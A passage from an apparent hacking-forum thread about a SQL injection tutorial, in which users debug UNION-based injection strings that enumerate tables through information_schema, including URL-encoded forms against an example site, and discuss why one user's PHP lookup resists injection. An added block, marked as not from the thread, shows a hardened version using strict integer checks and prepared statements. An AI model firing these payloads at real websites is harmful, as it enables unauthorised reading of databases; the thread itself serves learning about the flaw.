Author Topic: SQL Injection  (Read 12719 times)


Factionwars
Re: SQL Injection
« Reply #15 on: February 05, 2012, 08:49:08 PM »
l33tas did you try to break the first SELECT statement by throwing a -1 instead of a 1 so for example 
Code:
SELECT * FROM `table_test` WHERE straipsnio_id = '-1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10

l33tas
Re: SQL Injection
« Reply #16 on: February 06, 2012, 02:19:55 PM »
I get error: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5,6,7,8,9,10 LIMIT 0, 30' at line 1
Maybe my MySQL db doesn't understand concat(table_name)? Or must all DBs execute this function?
But if I try SELECT concat(table_name) FROM `tables` WHERE table_schema='test_table' it works fine..
« Last Edit: February 06, 2012, 06:58:19 PM by l33tas »

Kulverstukas
Re: SQL Injection
« Reply #17 on: February 11, 2012, 09:08:26 AM »
Videos are shit. You do not learn SQL injection without knowing SQL... this way you can learn a few commands and that's it! Only if you know SQL can you make queries and inject them... ugh.

Learn SQL and ONLY THEN learn how to inject!

ande
Re: SQL Injection
« Reply #18 on: February 11, 2012, 05:25:31 PM »
Quote:
I tried this tutorial and have a problem.
First: when you try to write http://evilzone.org/index.php?id=17+ORDER+BY+5 or http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,3 you get nothing. I solved this problem with ...?id=17' UNION ALL SELECT 1,2,3# but if you write it in the URL, in my case # doesn't work, so I changed it to %23, like ?id=17' UNION ALL SELECT 1,2,3%23.
Second: when I try ?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database() it doesn't work. I tried it in MySQL and it gives this error: #1109 - Unknown table 'table_test' in information_schema
In my case the SQL query is: SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10
Any solution?

Your SQL query is invalid:
Code:
SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10
That is not a valid SQL query. I think you mean:
Code:
SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name),5,6,7,8,9,10 FROM `information_schema.TABLES` WHERE table_schema=database()

D4rk0rD
Re: SQL Injection
« Reply #19 on: March 27, 2012, 02:57:05 PM »
Interesting article. The best way to master SQL injection is learning SQL first and studying what happens behind the scenes when we inject.

You can download a SQL manual from the MySQL site; that's a good manual to get familiar with SQL.
The focused mind can pierce through stone.

Factionwars
Re: SQL Injection
« Reply #20 on: March 27, 2012, 03:01:23 PM »
Quote from: D4rk0rD
Interesting article. The best way to master SQL injection is learning SQL first and studying what happens behind the scenes when we inject.

You can download a SQL manual from the MySQL site; that's a good manual to get familiar with SQL.

Also the way PHP/ASP/Python etc. creates and executes the queries.

dataspy
Re: SQL Injection
« Reply #21 on: March 27, 2012, 08:42:28 PM »
Awesome tutorial, thanks!!!!

I have to mess with this more. I was already doing all the preventive measures recommended in this tutorial, but even when I take the preventive measures away I still can't break my code. I'm gonna have to do a lot more studying!!!

example of some code I was trying to break (my dad owns a limousine company, I wrote this for him to keep track of maintenance on the vehicles)

SearchRecords2.php (redirects to ViewRecords.php below)
Code:
<a href=\"ViewRecord.php?MaintenanceRecordID=$Row[MaintenanceRecordID]\" target=\"_blank\">View</a>

ViewRecords.php
Code:
// assign vars
$MaintenanceRecordID = mysqli_real_escape_string($Con, trim($_GET['MaintenanceRecordID']));

if((!empty($MaintenanceRecordID)) && (is_numeric($MaintenanceRecordID)))
{
    // query to database
    $Query = "SELECT
        MaintenanceRecords.MaintenanceRecordID,
        MaintenanceRecords.MaintenanceRecordDate,
        MaintenanceRecords.MaintenanceRecordNotes,
        Vehicles.VehicleNumber,
        MaintenanceJobs.MaintenanceJob
        FROM MaintenanceRecords
        LEFT JOIN Vehicles ON Vehicles.VehicleID = MaintenanceRecords.VehicleID
        LEFT JOIN MaintenanceJobs ON MaintenanceJobs.MaintenanceJobID = MaintenanceRecords.MaintenanceJobID
        WHERE MaintenanceRecords.MaintenanceRecordID = '$MaintenanceRecordID'";

    // result from $Query
    $Result = mysqli_query($Con, $Query) or die(mysqli_error($Con));
}

when I took away mysqli_real_escape_string, is_numeric, and the '' for the var, I still couldn't inject :(

oh well something to play with later :)
« Last Edit: March 27, 2012, 08:49:33 PM by dataspy »
The only people for me are the mad ones, the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn, like fabulous yellow roman candles exploding like spiders across the stars.
-Kerouac

D4rk0rD
Re: SQL Injection
« Reply #22 on: March 30, 2012, 05:29:40 PM »
Get SQL manuals from this link:

http://dev.mysql.com/doc/refman/5.5/en/

This is the English manual; you can download it in other languages also. Just check around the site ;).
The focused mind can pierce through stone.

ande
Re: SQL Injection
« Reply #23 on: March 30, 2012, 09:56:16 PM »
Quote from: D4rk0rD
Interesting article. The best way to master SQL injection is learning SQL first and studying what happens behind the scenes when we inject.

You can download a SQL manual from the MySQL site; that's a good manual to get familiar with SQL.


I disagree, learning PHP alongside SQL(MySQL) is the best way. Then study the concept(s) of SQL injection vulnerabilities.




Quote from: dataspy
Awesome tutorial, thanks!!!!

I have to mess with this more. I was already doing all the preventive measures recommended in this tutorial, but even when I take the preventive measures away I still can't break my code. I'm gonna have to do a lot more studying!!!

example of some code I was trying to break (my dad owns a limousine company, I wrote this for him to keep track of maintenance on the vehicles)

SearchRecords2.php (redirects to ViewRecords.php below)
Code:
<a href=\"ViewRecord.php?MaintenanceRecordID=$Row[MaintenanceRecordID]\" target=\"_blank\">View</a>

ViewRecords.php
Code:
// assign vars
$MaintenanceRecordID = mysqli_real_escape_string($Con, trim($_GET['MaintenanceRecordID']));

if((!empty($MaintenanceRecordID)) && (is_numeric($MaintenanceRecordID)))
{
    // query to database
    $Query = "SELECT
        MaintenanceRecords.MaintenanceRecordID,
        MaintenanceRecords.MaintenanceRecordDate,
        MaintenanceRecords.MaintenanceRecordNotes,
        Vehicles.VehicleNumber,
        MaintenanceJobs.MaintenanceJob
        FROM MaintenanceRecords
        LEFT JOIN Vehicles ON Vehicles.VehicleID = MaintenanceRecords.VehicleID
        LEFT JOIN MaintenanceJobs ON MaintenanceJobs.MaintenanceJobID = MaintenanceRecords.MaintenanceJobID
        WHERE MaintenanceRecords.MaintenanceRecordID = '$MaintenanceRecordID'";

    // result from $Query
    $Result = mysqli_query($Con, $Query) or die(mysqli_error($Con));
}

when I took away mysqli_real_escape_string, is_numeric, and the '' for the var, I still couldn't inject :(

oh well something to play with later :)

Your code can't be injected to do any harm because the PHP script checks if the MaintenanceRecordID is numeric or not. However you can do things like MaintenanceRecordID=123e31 and you will most likely get an overflow problem, but it won't cause more than an error message.




Quote from: D4rk0rD
Get SQL manuals from this link:

http://dev.mysql.com/doc/refman/5.5/en/

This is the English manual; you can download it in other languages also. Just check around the site ;).


Not sure how this will help most people..
« Last Edit: March 30, 2012, 09:59:35 PM by ande »
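An added example, not code from the thread or from dataspy's script, showing why is_numeric() is a weak gate for the record id ande discusses above (it accepts 123e31) and how the same lookup looks with a strict integer check and a bound parameter instead of the string-built queries seen earlier in the thread. It assumes an open mysqli connection in $Con and reuses dataspy's table and column names; isStrictRecordId and fetchMaintenanceRecord are names chosen here.

```php
<?php
// Added example, not code from the thread. Assumes $Con is an open mysqli
// connection (as in dataspy's script) and reuses his table/column names.

// Strict id check: a plain positive integer and nothing else.
// filter_var() rejects exponents ("123e31") and decimals ("1.5"), which
// is_numeric() accepts, as well as anything that is not an integer at all.
function isStrictRecordId(string $raw): bool
{
    $ok = filter_var(trim($raw), FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => PHP_INT_MAX],
    ]);
    return $ok !== false;
}

// Compare what the two checks accept (sample inputs constructed here).
$samples = ['17', '123e31', '1.5', ' 42', "17' UNION ALL SELECT 1,2,3#"];
foreach ($samples as $s) {
    printf("%-34s is_numeric=%-5s strict=%s\n",
        var_export($s, true),
        is_numeric($s) ? 'true' : 'false',
        isStrictRecordId($s) ? 'true' : 'false');
}

// Hardened lookup: the validated integer is bound as a parameter, so the
// value is never part of the SQL text and cannot change the query's shape.
function fetchMaintenanceRecord(mysqli $Con, string $raw): ?array
{
    if (!isStrictRecordId($raw)) {
        return null;            // reject rather than guess what was meant
    }
    $id = (int) $raw;
    $stmt = $Con->prepare(
        'SELECT MaintenanceRecords.MaintenanceRecordID,
                MaintenanceRecords.MaintenanceRecordDate,
                MaintenanceRecords.MaintenanceRecordNotes,
                Vehicles.VehicleNumber,
                MaintenanceJobs.MaintenanceJob
           FROM MaintenanceRecords
           LEFT JOIN Vehicles ON Vehicles.VehicleID = MaintenanceRecords.VehicleID
           LEFT JOIN MaintenanceJobs
                  ON MaintenanceJobs.MaintenanceJobID = MaintenanceRecords.MaintenanceJobID
          WHERE MaintenanceRecords.MaintenanceRecordID = ?'
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}
```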

Droaxenius
Re: SQL Injection
« Reply #24 on: April 10, 2012, 12:49:21 PM »
Again an awesome tutorial ande.  ;)


Keep up the quality!
